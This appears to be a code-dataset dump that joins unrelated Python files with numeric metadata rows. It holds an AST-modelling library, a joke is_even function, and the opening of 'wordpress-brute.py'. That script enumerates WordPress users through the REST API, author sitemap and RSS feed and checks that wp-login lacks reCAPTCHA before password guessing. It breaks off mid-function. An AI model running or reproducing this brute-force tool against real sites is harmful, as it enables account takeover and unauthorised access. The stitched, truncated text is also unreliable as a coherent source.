definition else None @property def is_definition(self): """Whether this is a definition or a declaration of the class.""" return self._definition is self def _add(self, codeobj): """Add a child (function, variable, class) to this object.""" assert isinstance(codeobj, (CodeFunction, CodeVariable, CodeClass)) self.members.append(codeobj) codeobj.member_of = self def _children(self): """Yield all direct children of this object.""" for codeobj in self.members: yield codeobj def _afterpass(self): """Assign the `member_of` of child members and call their `_afterpass()`. This should only be called after the object is fully built. """ for codeobj in self.members: if not codeobj.is_definition: if not codeobj._definition is None: codeobj._definition.member_of = self codeobj._afterpass() def pretty_str(self, indent=0): """Return a human-readable string representation of this object. Kwargs: indent (int): The amount of spaces to use as indentation. """ spaces = ' ' * indent pretty = spaces + 'class ' + self.name if self.superclasses: superclasses = ', '.join(self.superclasses) pretty += '(' + superclasses + ')' pretty += ':\n' if self.members: pretty += '\n\n'.join( c.pretty_str(indent + 2) for c in self.members ) else: pretty += spaces + ' [declaration]' return pretty def __repr__(self): """Return a string representation of this object.""" return '[class {}]'.format(self.name) class CodeNamespace(CodeEntity): """This class represents a program namespace. A namespace is a concept that is explicit in languages such as C++, but less explicit in many others. In Python, the closest thing should be a module. In Java, it may be the same as a class, or non-existent. A namespace typically has a name and a list of children objects (variables, functions or classes). """ def __init__(self, scope, parent, name): """Constructor for namespaces. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. name (str): The name of the namespace in the program. """ CodeEntity.__init__(self, scope, parent) self.name = name self.children = [] def _add(self, codeobj): """Add a child (namespace, function, variable, class) to this object.""" assert isinstance(codeobj, (CodeNamespace, CodeClass, CodeFunction, CodeVariable)) self.children.append(codeobj) def _children(self): """Yield all direct children of this object.""" for codeobj in self.children: yield codeobj def _afterpass(self): """Call the `_afterpass()` of child objects. This should only be called after the object is fully built. """ for codeobj in self.children: codeobj._afterpass() def pretty_str(self, indent=0): """Return a human-readable string representation of this object. Kwargs: indent (int): The amount of spaces to use as indentation. """ spaces = ' ' * indent pretty = '{}namespace {}:\n'.format(spaces, self.name) pretty += '\n\n'.join(c.pretty_str(indent + 2) for c in self.children) return pretty def __repr__(self): """Return a string representation of this object.""" return '[namespace {}]'.format(self.name) class CodeGlobalScope(CodeEntity): """This class represents the global scope of a program. The global scope is the root object of a program. If there are no better candidates, it is the `scope` and `parent` of all other objects. It is also the only object that does not have a `scope` or `parent`. """ def __init__(self): """Constructor for global scope objects.""" CodeEntity.__init__(self, None, None) self.children = [] def _add(self, codeobj): """Add a child (namespace, function, variable, class) to this object.""" assert isinstance(codeobj, (CodeNamespace, CodeClass, CodeFunction, CodeVariable)) self.children.append(codeobj) def _children(self): """Yield all direct children of this object.""" for codeobj in self.children: yield codeobj def _afterpass(self): """Call the `_afterpass()` of child objects. This should only be called after the object is fully built. """ for codeobj in self.children: codeobj._afterpass() def pretty_str(self, indent=0): """Return a human-readable string representation of this object. Kwargs: indent (int): The amount of spaces to use as indentation. """ return '\n\n'.join( codeobj.pretty_str(indent=indent) for codeobj in self.children ) # ----- Expression Entities --------------------------------------------------- class CodeExpression(CodeEntity): """Base class for expressions within a program. Expressions can be of many types, including literal values, operators, references and function calls. This class is meant to be inherited from, and not instantiated directly. An expression typically has a name (e.g. the name of the function in a function call) and a type (`result`). Also, an expression should indicate whether it is enclosed in parentheses. """ def __init__(self, scope, parent, name, result, paren=False): """Constructor for expressions. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. name (str): The name of the expression in the program. result (str): The return type of the expression in the program. Kwargs: paren (bool): Whether the expression is enclosed in parentheses. """ CodeEntity.__init__(self, scope, parent) self.name = name self.result = result self.parenthesis = paren @property def function(self): """The function where this expression occurs.""" return self._lookup_parent(CodeFunction) @property def statement(self): """The statement where this expression occurs.""" return self._lookup_parent(CodeStatement) def pretty_str(self, indent=0): """Return a human-readable string representation of this object. Kwargs: indent (int): The amount of spaces to use as indentation. """ if self.parenthesis: return (' ' * indent) + '(' + self.name + ')' return (' ' * indent) + self.name def __repr__(self): """Return a string representation of this object.""" return '[{}] {}'.format(self.result, self.name) class SomeValue(CodeExpression): """This class represents an unknown value for diverse primitive types.""" def __init__(self, result): """Constructor for unknown values.""" CodeExpression.__init__(self, None, None, result, result) def _children(self): """Yield all the children of this object, that is no children.""" return iter(()) SomeValue.INTEGER = SomeValue("int") SomeValue.FLOATING = SomeValue("float") SomeValue.CHARACTER = SomeValue("char") SomeValue.STRING = SomeValue("string") SomeValue.BOOL = SomeValue("bool") class CodeLiteral(CodeExpression): """Base class for literal types not present in Python. This class is meant to represent a literal whose type is not numeric, string or boolean, as bare Python literals are used for those. A literal has a value (e.g. a list `[1, 2, 3]`) and a type (`result`), and could be enclosed in parentheses. It does not have a name. """ def __init__(self, scope, parent, value, result, paren=False): """Constructor for literals. As literals have no name, a constant string is used instead. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. value (CodeExpression|CodeExpression[]): This literal's value. result (str): The return type of the literal in the program. Kwargs: paren (bool): Whether the literal is enclosed in parentheses. """ CodeExpression.__init__(self, scope, parent, 'literal', result, paren) self.value = value def pretty_str(self, indent=0): """Return a human-readable string representation of this object. Kwargs: indent (int): The amount of spaces to use as indentation. """ if self.parenthesis: return '{}({})'.format(' ' * indent, pretty_str(self.value)) return pretty_str(self.value, indent=indent) def __repr__(self): """Return a string representation of this object.""" return '[{}] {!r}'.format(self.result, self.value) CodeExpression.TYPES = (int, long, float, bool, basestring, SomeValue, CodeLiteral, CodeExpression) CodeExpression.LITERALS = (int, long, float, bool, basestring, CodeLiteral) class CodeNull(CodeLiteral): """This class represents an indefinite value. Many programming languages have their own version of this concept: Java has null references, C/C++ NULL pointers, Python None and so on. """ def __init__(self, scope, parent, paren=False): """Constructor for null literals. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. Kwargs: paren (bool): Whether the null literal is enclosed in parentheses. """ CodeLiteral.__init__(self, scope, parent, None, 'null', paren) def _children(self): """Yield all the children of this object, that is no children. This class inherits from CodeLiteral just for consistency with the class hierarchy. It should have no children, thus an empty iterator is returned. """ return iter(()) class CodeCompositeLiteral(CodeLiteral): """This class represents a composite literal. A composite literal is any type of literal whose value is compound, rather than simple. An example present in many programming languages are list literals, often constructed as `[1, 2, 3]`. A composite literal has a sequence of values that compose it (`values`), a type (`result`), and it should indicate whether it is enclosed in parentheses. """ def __init__(self, scope, parent, result, value=(), paren=False): """Constructor for a compound literal. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. value (iterable): The initial value sequence in this composition. result (str): The return type of the literal in the program. Kwargs: paren (bool): Whether the literal is enclosed in parentheses. """ try: value = list(value) except TypeError as te: raise AssertionError(str(te)) CodeLiteral.__init__(self, scope, parent, value, result, paren) @property def values(self): return tuple(self.value) def _add_value(self, child): """Add a value to the sequence in this composition.""" self.value.append(child) def _children(self): """Yield all direct children of this object.""" for value in self.value: if isinstance(value, CodeEntity): yield value def pretty_str(self, indent=0): """Return a human-readable string representation of this object. Kwargs: indent (int): The amount of spaces to use as indentation. """ indent = ' ' * indent values = '{{{}}}'.format(', '.join(map(pretty_str, self.value))) if self.parenthesis: return '{}({})'.format(indent, values) return '{}{}'.format(indent, values) def __repr__(self): """Return a string representation of this object.""" return '[{}] {{{}}}'.format(self.result, ', '.join(map(repr, self.value))) class CodeReference(CodeExpression): """This class represents a reference expression (e.g. to a variable). A reference typically has a name (of what it is referencing), and a return type. If the referenced entity is known, `reference` should be set. If the reference is a field/attribute of an object, `field_of` should be set to that object. """ def __init__(self, scope, parent, name, result, paren=False): """Constructor for references. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. name (str): The name of the reference in the program. result (str): The return type of the expression in the program. Kwargs: paren (bool): Whether the reference is enclosed in parentheses. """ CodeExpression.__init__(self, scope, parent, name, result, paren) self.field_of = None self.reference = None def _set_field(self, codeobj): """Set the object that contains the attribute this is a reference of.""" assert isinstance(codeobj, CodeExpression) self.field_of = codeobj def _children(self): """Yield all direct children of this object.""" if self.field_of: yield self.field_of def pretty_str(self, indent=0): """Return a human-readable string representation of this object. Kwargs: indent (int): The amount of spaces to use as indentation. """ spaces = ' ' * indent pretty = '{}({})' if self.parenthesis else '{}{}' name = ('{}.{}'.format(self.field_of.pretty_str(), self.name) if self.field_of else self.name) return pretty.format(spaces, name) def __str__(self): """Return a string representation of this object.""" return '#' + self.name def __repr__(self): """Return a string representation of this object.""" if self.field_of: return '[{}] ({}).{}'.format(self.result, self.field_of, self.name) return '[{}] #{}'.format(self.result, self.name) class CodeOperator(CodeExpression): """This class represents an operator expression (e.g. `a + b`). Operators can be unary or binary, and often return numbers or booleans. Some languages also support ternary operators. Do note that assignments are often considered expressions, and, as such, assignment operators are included here. An operator typically has a name (its token), a return type, and a tuple of its arguments. """ _UNARY_TOKENS = ("+", "-") _BINARY_TOKENS = ("+", "-", "*", "/", "%", "<", ">", "<=", ">=", "==", "!=", "&&", "||", "=") def __init__(self, scope, parent, name, result, args=None, paren=False): """Constructor for operators. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. name (str): The name of the operator in the program. result (str): The return type of the operator in the program. Kwargs: args (tuple): Initial tuple of arguments. paren (bool): Whether the expression is enclosed in parentheses. """ CodeExpression.__init__(self, scope, parent, name, result, paren) self.arguments = args or () @property def is_unary(self): """Whether this is a unary operator.""" return len(self.arguments) == 1 @property def is_binary(self): """Whether this is a binary operator.""" return len(self.arguments) == 2 @property def is_ternary(self): """Whether this is a ternary operator.""" return len(self.arguments) == 3 @property def is_assignment(self): """Whether this is an assignment operator.""" return self.name == "=" def _add(self, codeobj): """Add a child (argument) to this object.""" assert isinstance(codeobj, CodeExpression.TYPES) self.arguments = self.arguments + (codeobj,) def _children(self): """Yield all direct children of this object.""" for codeobj in self.arguments: if isinstance(codeobj, CodeExpression): yield codeobj def pretty_str(self, indent=0): """Return a human-readable string representation of this object. Kwargs: indent (int): The amount of spaces to use as indentation. """ indent = ' ' * indent pretty = '{}({})' if self.parenthesis else '{}{}' if self.is_unary: operator = self.name + pretty_str(self.arguments[0]) else: operator = '{} {} {}'.format(pretty_str(self.arguments[0]), self.name, pretty_str(self.arguments[1])) return pretty.format(indent, operator) def __repr__(self): """Return a string representation of this object.""" if self.is_unary: return '[{}] {}({})'.format(self.result, self.name, self.arguments[0]) if self.is_binary: return '[{}] ({}){}({})'.format(self.result, self.arguments[0], self.name, self.arguments[1]) return '[{}] {}'.format(self.result, self.name) class CodeFunctionCall(CodeExpression): """This class represents a function call. A function call typically has a name (of the called function), a return type, a tuple of its arguments and a reference to the called function. If a call references a class method, its `method_of` should be set to the object on which a method is being called. """ def __init__(self, scope, parent, name, result, paren=False): """Constructor for function calls. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. name (str): The name of the function in the program. result (str): The return type of the expression in the program. Kwargs: paren (bool): Whether the expression is enclosed in parentheses. """ CodeExpression.__init__(self, scope, parent, name, result, paren) self.full_name = name self.arguments = () self.method_of = None self.reference = None @property def is_constructor(self): """Whether the called function is a constructor.""" return self.result == self.name def _add(self, codeobj): """Add a child (argument) to this object.""" assert isinstance(codeobj, CodeExpression.TYPES) self.arguments = self.arguments + (codeobj,) def _set_method(self, codeobj): """Set the object on which a method is called.""" assert isinstance(codeobj, CodeExpression) self.method_of = codeobj def _children(self): """Yield all direct children of this object.""" if self.method_of: yield self.method_of for codeobj in self.arguments: if isinstance(codeobj, CodeExpression): yield codeobj def pretty_str(self, indent=0): """Return a human-readable string representation of this object. Kwargs: indent (int): The amount of spaces to use as indentation. """ indent = ' ' * indent pretty = '{}({})' if self.parenthesis else '{}{}' args = ', '.join(map(pretty_str, self.arguments)) if self.method_of: call = '{}.{}({})'.format(self.method_of.pretty_str(), self.name, args) elif self.is_constructor: call = 'new {}({})'.format(self.name, args) else: call = '{}({})'.format(self.name, args) return pretty.format(indent, call) def __repr__(self): """Return a string representation of this object.""" args = ', '.join(map(str, self.arguments)) if self.is_constructor: return '[{}] new {}({})'.format(self.result, self.name, args) if self.method_of: return '[{}] {}.{}({})'.format(self.result, self.method_of.name, self.name, args) return '[{}] {}({})'.format(self.result, self.name, args) class CodeDefaultArgument(CodeExpression): """This class represents a default argument. Some languages, such as C++, allow function parameters to have default values when not explicitly provided by the programmer. This class represents such omitted arguments. A default argument has only a return type. """ def __init__(self, scope, parent, result): """Constructor for default arguments. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. result (str): The return type of the argument in the program. """ CodeExpression.__init__(self, scope, parent, '(default)', result) # ----- Statement Entities ---------------------------------------------------- class CodeStatement(CodeEntity): """Base class for program statements. Programming languages often define diverse types of statements (e.g. return statements, control flow, etc.). This class provides common functionality for such statements. In many languages, statements must be contained within a function. An operator typically has a name (its token), a return type, and a tuple of its arguments. """ def __init__(self, scope, parent): """Constructor for statements. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. """ CodeEntity.__init__(self, scope, parent) self._si = -1 @property def function(self): """The function where this statement appears in.""" return self._lookup_parent(CodeFunction) class CodeJumpStatement(CodeStatement): """This class represents a jump statement (e.g. `return`, `break`). A jump statement has a name. In some cases, it may also have an associated value (e.g. `return 0`). """ def __init__(self, scope, parent, name): """Constructor for jump statements. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. name (str): The name of the statement in the program. """ CodeStatement.__init__(self, scope, parent) self.name = name self.value = None def _add(self, codeobj): """Add a child (value) to this object.""" assert isinstance(codeobj, CodeExpression.TYPES) self.value = codeobj def _children(self): """Yield all direct children of this object.""" if isinstance(self.value, CodeExpression): yield self.value def pretty_str(self, indent=0): """Return a human-readable string representation of this object. Kwargs: indent (int): The amount of spaces to use as indentation. """ indent = ' ' * indent if self.value is not None: return '{}{} {}'.format(indent, self.name, pretty_str(self.value)) return indent + self.name def __repr__(self): """Return a string representation of this object.""" if self.value is not None: return '{} {}'.format(self.name, str(self.value)) return self.name class CodeExpressionStatement(CodeStatement): """This class represents an expression statement. It is only a wrapper. Many programming languages allow expressions to be statements on their own. A common example is the assignment operator, which can be a statement on its own, but also returns a value when contained within a larger expression. """ def __init__(self, scope, parent, expression=None): """Constructor for expression statements. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. Kwargs: expression (CodeExpression): The expression of this statement. """ CodeStatement.__init__(self, scope, parent) self.expression = expression def _children(self): """Yield all direct children of this object.""" if isinstance(self.expression, CodeExpression): yield self.expression def pretty_str(self, indent=0): """Return a human-readable string representation of this object. Kwargs: indent (int): The amount of spaces to use as indentation. """ return pretty_str(self.expression, indent=indent) def __repr__(self): """Return a string representation of this object.""" return repr(self.expression) class CodeBlock(CodeStatement, CodeStatementGroup): """This class represents a code block (e.g. `{}` in C, C++, Java, etc.). Blocks are little more than collections of statements, while being considered a statement themselves. Some languages allow blocks to be implicit in some contexts, e.g. an `if` statement omitting curly braces in C, C++, Java, etc. This model assumes that control flow branches and functions always have a block as their body. """ def __init__(self, scope, parent, explicit=True): """Constructor for code blocks. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. Kwargs: explicit (bool): Whether the block is explicit in the code. """ CodeStatement.__init__(self, scope, parent) self.body = [] self.explicit = explicit def statement(self, i): """Return the *i*-th statement of this block.""" return self.body[i] def _add(self, codeobj): """Add a child (statement) to this object.""" assert isinstance(codeobj, CodeStatement) codeobj._si = len(self.body) self.body.append(codeobj) def _children(self): """Yield all direct children of this object.""" for codeobj in self.body: yield codeobj def pretty_str(self, indent=0): """Return a human-readable string representation of this object. Kwargs: indent (int): The amount of spaces to use as indentation. """ if self.body: return '\n'.join(stmt.pretty_str(indent) for stmt in self.body) else: return (' ' * indent) + '[empty]' def __repr__(self): """Return a string representation of this object.""" return str(self.body) class CodeDeclaration(CodeStatement): """This class represents a declaration statement. Some languages, such as C, C++ or Java, consider this special kind of statement for declaring variables within a function, for instance. A declaration statement contains a list of all declared variables. """ def __init__(self, scope, parent): """Constructor for declaration statements. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. """ CodeStatement.__init__(self, scope, parent) self.variables = [] def _add(self, codeobj): """Add a child (variable) to this object.""" assert isinstance(codeobj, CodeVariable) self.variables.append(codeobj) def _children(self): """Yield all direct children of this object.""" for codeobj in self.variables: yield codeobj def pretty_str(self, indent=0): """Return a human-readable string representation of this object. Kwargs: indent (int): The amount of spaces to use as indentation. """ spaces = ' ' * indent return spaces + ', '.join(v.pretty_str() for v in self.variables) def __repr__(self): """Return a string representation of this object.""" return str(self.variables) class CodeControlFlow(CodeStatement, CodeStatementGroup): """Base class for control flow structures (e.g. `for` loops). Control flow statements are assumed to have, at least, one branch (a boolean condition and a `CodeBlock` that is executed when the condition is met). Specific implementations may consider more branches, or default branches (executed when no condition is met). A control flow statement typically has a name. """ def __init__(self, scope, parent, name): """Constructor for control flow structures. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. name (str): The name of the control flow statement in the program. """ CodeStatement.__init__(self, scope, parent) self.name = name self.condition = True self.body = CodeBlock(scope, self, explicit=False) def get_branches(self): """Return a list of branches, where each branch is a pair of condition and respective body.""" return [(self.condition, self.body)] def _set_condition(self, condition): """Set the condition for this control flow structure.""" assert isinstance(condition, CodeExpression.TYPES) self.condition = condition def _set_body(self, body): """Set the main body for this control flow structure.""" assert isinstance(body, CodeStatement) if isinstance(body, CodeBlock): self.body = body else: self.body._add(body) def _children(self): """Yield all direct children of this object.""" if isinstance(self.condition, CodeExpression): yield self.condition for codeobj in self.body._children(): yield codeobj def __repr__(self): """Return a string representation of this object.""" return '{} {}'.format(self.name, self.get_branches()) class CodeConditional(CodeControlFlow): """This class represents a conditional (`if`). A conditional is allowed to have a default branch (the `else` branch), besides its mandatory one. """ def __init__(self, scope, parent): """Constructor for conditionals. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. """ CodeControlFlow.__init__(self, scope, parent, 'if') self.else_body = CodeBlock(scope, self, explicit=False) @property def then_branch(self): """The branch associated with a condition.""" return self.condition, self.body @property def else_branch(self): """The default branch of the conditional.""" return True, self.else_body def statement(self, i): """Return the *i*-th statement of this block. Behaves as if the *then* and *else* branches were concatenated, for indexing purposes. """ # ----- This code is just to avoid creating a new list and # returning a custom exception message. o = len(self.body) n = o + len(self.else_body) if i >= 0 and i < n: if i < o: return self.body.statement(i) return self.else_body.statement(i - o) elif i < 0 and i >= -n: if i >= o - n: return self.else_body.statement(i) return self.body.statement(i - o + n) raise IndexError('statement index out of range') def statement_after(self, i): """Return the statement after the *i*-th one, or `None`.""" k = i + 1 o = len(self.body) n = o + len(self.else_body) if k > 0: if k < o: return self.body.statement(k) if k > o and k < n: return self.else_body.statement(k) if k < 0: if k < o - n and k > -n: return self.body.statement(k) if k > o - n: return self.else_body.statement(k) return None def get_branches(self): """Return a list with the conditional branch and the default branch.""" if self.else_branch: return [self.then_branch, self.else_branch] return [self.then_branch] def _add_default_branch(self, body): """Add a default body for this conditional (the `else` branch).""" assert isinstance(body, CodeStatement) if isinstance(body, CodeBlock): self.else_body = body else: self.else_body._add(body) def __len__(self): """Return the length of both branches combined.""" return len(self.body) + len(self.else_body) def _children(self): """Yield all direct children of this object.""" if isinstance(self.condition, CodeExpression): yield self.condition for codeobj in self.body._children(): yield codeobj for codeobj in self.else_body._children(): yield codeobj def pretty_str(self, indent=0): """Return a human-readable string representation of this object. Kwargs: indent (int): The amount of spaces to use as indentation. """ spaces = ' ' * indent condition = pretty_str(self.condition) pretty = '{}if ({}):\n'.format(spaces, condition) pretty += self.body.pretty_str(indent=indent + 2) if self.else_body: pretty += '\n{}else:\n'.format(spaces) pretty += self.else_body.pretty_str(indent=indent + 2) return pretty class CodeLoop(CodeControlFlow): """This class represents a loop (e.g. `while`, `for`). Some languages allow loops to define local declarations, as well as an increment statement. A loop has only a single branch, its condition plus the body that should be repeated while the condition holds. """ def __init__(self, scope, parent, name): """Constructor for loops. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. name (str): The name of the loop statement in the program. """ CodeControlFlow.__init__(self, scope, parent, name) self.declarations = None self.increment = None def _set_declarations(self, declarations): """Set declarations local to this loop (e.g. `for` variables).""" assert isinstance(declarations, CodeStatement) self.declarations = declarations declarations.scope = self.body def _set_increment(self, statement): """Set the increment statement for this loop (e.g. in a `for`).""" assert isinstance(statement, CodeStatement) self.increment = statement statement.scope = self.body def _children(self): """Yield all direct children of this object.""" if self.declarations: yield self.declarations if isinstance(self.condition, CodeExpression): yield self.condition if self.increment: yield self.increment for codeobj in self.body._children(): yield codeobj def pretty_str(self, indent=0): """Return a human-readable string representation of this object. Kwargs: indent (int): The amount of spaces to use as indentation. """ spaces = ' ' * indent condition = pretty_str(self.condition) v = self.declarations.pretty_str() if self.declarations else '' i = self.increment.pretty_str(indent=1) if self.increment else '' pretty = '{}for ({}; {}; {}):\n'.format(spaces, v, condition, i) pretty += self.body.pretty_str(indent=indent + 2) return pretty class CodeSwitch(CodeControlFlow): """This class represents a switch statement. A switch evaluates a value (its `condition`) and then declares at least one branch (*cases*) that execute when the evaluated value is equal to the branch value. It may also have a default branch. Switches are often one of the most complex constructs of programming languages, so this implementation might be lackluster. """ def __init__(self, scope, parent): """Constructor for switches. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. """ CodeControlFlow.__init__(self, scope, parent, "switch") self.cases = [] self.default_case = None def _add_branch(self, value, statement): """Add a branch/case (value and statement) to this switch.""" self.cases.append((value, statement)) def _add_default_branch(self, statement): """Add a default branch to this switch.""" self.default_case = statement def pretty_str(self, indent=0): """Return a human-readable string representation of this object. Kwargs: indent (int): The amount of spaces to use as indentation. """ spaces = ' ' * indent condition = pretty_str(self.condition) pretty = '{}switch ({}):\n'.format(spaces, condition) pretty += self.body.pretty_str(indent=indent + 2) return pretty class CodeTryBlock(CodeStatement, CodeStatementGroup): """This class represents a try-catch block statement. `try` blocks have a main body of statements, just like regular blocks. Multiple `catch` blocks may be defined to handle specific types of exceptions. Some languages also allow a `finally` block that is executed after the other blocks (either the `try` block, or a `catch` block, when an exception is raised and handled). """ def __init__(self, scope, parent): """Constructor for try block structures. Args: scope (CodeEntity): The program scope where this object belongs. parent (CodeEntity): This object's parent in the program tree. """ CodeStatement.__init__(self, scope, parent) self.body = CodeBlock(scope, self, explicit=True) self.catches = [] self.finally_body = CodeBlock(scope, self, explicit=True) def _set_body(self, body): """Set the main body for try block structure.""" assert isinstance(body, CodeBlock) self.body = body def _add_catch(self, catch_block): """Add a catch block (exception variable declaration and block) to this try block structure. """ assert isinstance(catch_block, self.CodeCatchBlock) self.catches.append(catch_block) def _set_finally_body(self, body): """Set the finally body for try block structure.""" assert isinstance(body, CodeBlock) self.finally_body = body def _children(self): """Yield all direct children of this object.""" for codeobj in self.body._children(): yield codeobj for catch_block in self.catches: for codeobj in catch_block._children(): yield codeobj for codeobj in self.finally_body._children(): yield codeobj def __len__(self): """Return the length of all blocks combined.""" n = len(self.body) + len(self.catches) + len(self.finally_body) n += sum(map(len, self.catches)) return n def __repr__(self): """Return a string representation of this object.""" return 'try {} {} {}'.format(self.body, self.catches, self.finally_body) def pretty_str(self, indent=0): """Return a human-readable string representation of this object. Kwargs: indent (int): The amount of spaces to use as indentation. """ spaces = ' ' * indent pretty = spaces + 'try:\n' pretty += self.body.pretty_str(indent=indent + 2) for block in self.catches: pretty += '\n' + block.pretty_str(indent) if len(self.finally_body) > 0: pretty += '\n{}finally:\n'.format(spaces) pretty += self.finally_body.pretty_str(indent=indent + 2) return pretty class CodeCatchBlock(CodeStatement, CodeStatementGroup): """Helper class for catch statements within a try-catch block.""" def __init__(self, scope, parent): """Constructor for catch block structures.""" CodeStatement.__init__(self, scope, parent) self.declarations = None self.body = CodeBlock(scope, self, explicit=True) def _set_declarations(self, declarations): """Set declarations local to this catch block.""" assert isinstance(declarations, CodeStatement) self.declarations = declarations declarations.scope = self.body def _set_body(self, body): """Set the main body of the catch block.""" assert isinstance(body, CodeBlock) self.body = body def _children(self): """Yield all direct children of this object.""" if isinstance(self.declarations, CodeStatement): yield self.declarations for codeobj in self.body._children(): yield codeobj def __repr__(self): """Return a string representation of this object.""" return 'catch ({}) {}'.format(self.declarations, self.body) def pretty_str(self, indent=0): """Return a human-readable string representation of this object. Kwargs: indent (int): The amount of spaces to use as indentation. """ spaces = ' ' * indent decls = ('...' if self.declarations is None else self.declarations.pretty_str()) body = self.body.pretty_str(indent=indent + 2) pretty = '{}catch ({}):\n{}'.format(spaces, decls, body) return pretty ############################################################################### # Helpers ############################################################################### def pretty_str(something, indent=0): """Return a human-readable string representation of an object. Uses `pretty_str` if the given value is an instance of `CodeEntity` and `repr` otherwise. Args: something: Some value to convert. Kwargs: indent (int): The amount of spaces to use as indentation. """ if isinstance(something, CodeEntity): return something.pretty_str(indent=indent) else: return (' ' * indent) + repr(something)
35.889841
81
0.60325
6,906
58,644
5.038952
0.082682
0.034771
0.02138
0.025662
0.571281
0.507141
0.465732
0.430616
0.409926
0.393575
0
0.001641
0.293602
58,644
1,633
82
35.911819
0.838387
0.427819
0
0.487805
0
0
0.024693
0
0
0
0
0
0.032999
1
0.220947
false
0.012912
0
0.002869
0.407461
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
0
0
0
1
fc4647689f1b8d8a1248e0d89dd5fa8d84dedfbf
350
py
Python
python/is_even.py
c1m50c/twitter-examples
c3ed7cf88dacbb761fed1b0b0dc593d7d3648378
[ "MIT" ]
null
null
null
python/is_even.py
c1m50c/twitter-examples
c3ed7cf88dacbb761fed1b0b0dc593d7d3648378
[ "MIT" ]
null
null
null
python/is_even.py
c1m50c/twitter-examples
c3ed7cf88dacbb761fed1b0b0dc593d7d3648378
[ "MIT" ]
null
null
null
def is_even(i: int) -> bool: if i == 1: return False elif i == 2: return True elif i == 3: return False elif i == 4: return True elif i == 5: ... # Never do that! Use one of these instead... is_even = lambda i : i % 2 == 0 is_even = lambda i : not i & 1 is_odd = lambda i : not is_even(i)
20.588235
44
0.511429
59
350
2.949153
0.474576
0.137931
0.08046
0.183908
0
0
0
0
0
0
0
0.036364
0.371429
350
17
45
20.588235
0.754545
0.12
0
0.285714
0
0
0
0
0
0
0
0
0
1
0.071429
false
0
0
0
0.357143
0
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
fc46a91fda80741480960994acf3dbc98c9e618b
8,886
py
Python
wordpress-brute.py
RandomRobbieBF/wordpress-bf
fe78d4367b7baaf18a4200c5c040595d37b4100f
[ "MIT" ]
1
2020-07-27T11:30:23.000Z
2020-07-27T11:30:23.000Z
wordpress-brute.py
RandomRobbieBF/wordpress-bf
fe78d4367b7baaf18a4200c5c040595d37b4100f
[ "MIT" ]
null
null
null
wordpress-brute.py
RandomRobbieBF/wordpress-bf
fe78d4367b7baaf18a4200c5c040595d37b4100f
[ "MIT" ]
1
2020-05-17T12:40:13.000Z
2020-05-17T12:40:13.000Z
#!/usr/bin/env python # # Wordpress Bruteforce Tool # # By @random_robbie # # import requests import json import sys import argparse import re import os.path from requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) session = requests.Session() parser = argparse.ArgumentParser() parser.add_argument("-u", "--url", required=True, default="http://wordpress.lan", help="Wordpress URL") parser.add_argument("-f", "--file", required=True, default="pass.txt" ,help="Password File") args = parser.parse_args() url = args.url passfile = args.file http_proxy = "" proxyDict = { "http" : http_proxy, "https" : http_proxy, "ftp" : http_proxy } # Grab Wordpress Users via Wordpress JSON api def grab_users_api(url): headers = {"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0","Connection":"close","Accept":"*/*"} response = session.get(""+url+"/wp-json/wp/v2/users", headers=headers,verify=False, proxies=proxyDict) if 'rest_user_cannot_view' in response.text: print ("[-] REST API Endpoint Requires Permissions [-]") return False if response.status_code == 404: print ("[-] Rest API Endpoint returns 404 Not Found [-]") return False elif response.status_code == 200: jsonstr = json.loads(response.content) return jsonstr # Grab Wordpress Users via Sitemap def grab_users_sitemap(url): headers = {"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0","Connection":"close","Accept":"*/*"} response = session.get(""+url+"/author-sitemap.xml", headers=headers,verify=False, proxies=proxyDict) if response.status_code == 404: return False elif response.status_code == 200: return response.text # Grab Wordpress Users via RSS Feed def grab_users_rssfeed(url): headers = {"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0","Connection":"close","Accept":"*/*"} response = session.get(""+url+"/feed/", headers=headers,verify=False, proxies=proxyDict) if response.status_code == 404: return False elif response.status_code == 200: if "dc:creator" in response.text: return response.text # Check we can get to wp-admin login. def check_wpadmin(url): headers = {"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0","Connection":"close","Accept":"*/*"} response = session.get(""+url+"/wp-login.php?reauth=1&jetpack-sso-show-default-form=1", headers=headers,verify=False, proxies=proxyDict) if "Powered by WordPress" in response.text: if "wp-submit" in response.text: if "reCAPTCHA" not in response.text: return True else: return 